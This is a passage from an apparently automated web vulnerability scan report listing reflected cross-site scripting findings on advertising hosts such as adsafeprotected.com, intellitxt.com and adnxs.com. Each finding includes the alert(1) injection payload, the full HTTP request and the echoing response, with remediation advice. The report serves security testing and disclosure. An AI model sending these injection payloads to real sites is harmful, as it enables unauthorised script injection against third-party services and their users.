Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:22 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
PpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283d3069"-alert(1)-"bcb2ac021ed;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghn
...[SNIP]...
4.61. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb011"-alert(1)-"6b5839ea77b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A582730ED9D3E7ACA7D653A8A640404F; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
TM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?&cb011"-alert(1)-"6b5839ea77b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h32"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...
4.62. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14d92"-alert(1)-"e11a01d09da was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=969C7D18C17E6CF125DE65C6192D6639; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
NTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1576327943?14d92"-alert(1)-"e11a01d09da",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25h0b"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...
4.63. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba4a"-alert(1)-"51d574e77ee was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va3.wtp101.com/click?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F645E89D2DE63B512888E6C0840EEADD; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:03:21 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzN
...[SNIP]...
jAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M%3D5ba4a"-alert(1)-"51d574e77ee&redir=;ord=1576327943?",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gtt25gx4"
};


(function(){v
...[SNIP]...
4.64. http://goal.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e6ebd%3balert(1)//7662a95d143 was submitted in the jscallback parameter. This input was echoed as e6ebd;alert(1)//7662a95d143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20111002235932&cc=us&hk=1&ipid=17560&mh=e4d7a117d40d51c07461e5ec2ec357de&pvm=8a1bde305c8c7fc10d8c64ac123edbc3&pvu=D86A9C320A56454497A101B6CE3CD363&rcc=--&so=0&prf=ll%3A7961%7Cintl%3A15542%7Cadvint%3A15578%7Cadvl%3A15578%7Ctl%3A15579&jscallback=$iTXT.js.callback1e6ebd%3balert(1)//7662a95d143 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 03 Oct 2011 00:02:09 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1e6ebd;alert(1)//7662a95d143();}catch(e){}
4.65. http://goal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf91d'-alert(1)-'82f479773ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=17560&cf91d'-alert(1)-'82f479773ab=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11466
Date: Mon, 03 Oct 2011 00:00:59 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
18'};$iTXT.js.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='21';$iTXT.js.serverUrl='http://goal.us.intellitxt.com';$iTXT.js.serverName='goal.us.intellitxt.com';$iTXT.js.pageQuery='ipid=17560&cf91d'-alert(1)-'82f479773ab=1';$iTXT.js.ipid='17560';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=80000&c
...[SNIP]...
4.66. http://goal.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce85d%3balert(1)//92071f6f8b5 was submitted in the jscallback parameter. This input was echoed as ce85d;alert(1)//92071f6f8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0ce85d%3balert(1)//92071f6f8b5 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7509
Date: Mon, 03 Oct 2011 00:02:54 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0ce85d;alert(1)//92071f6f8b5({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.67. http://goal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75336"-alert(1)-"a0600fbcc40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317599965157&pagecl=36717&fv=10&muid=&refurl=http%3A%2F%2Fwww.goal.com%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run&ipid=17560&jscallback=$iTXT.js.callback0&75336"-alert(1)-"a0600fbcc40=1 HTTP/1.1
Host: goal.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7490
Date: Mon, 03 Oct 2011 00:03:04 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
17560,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run","rcc":"--","cc":"us","75336"-alert(1)-"a0600fbcc40":"1"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}$iTXT.glob.params.set
...[SNIP]...
4.68. http://ib.adnxs.com/ab [ccd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971ff'-alert(1)-'79037dbfcc8 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
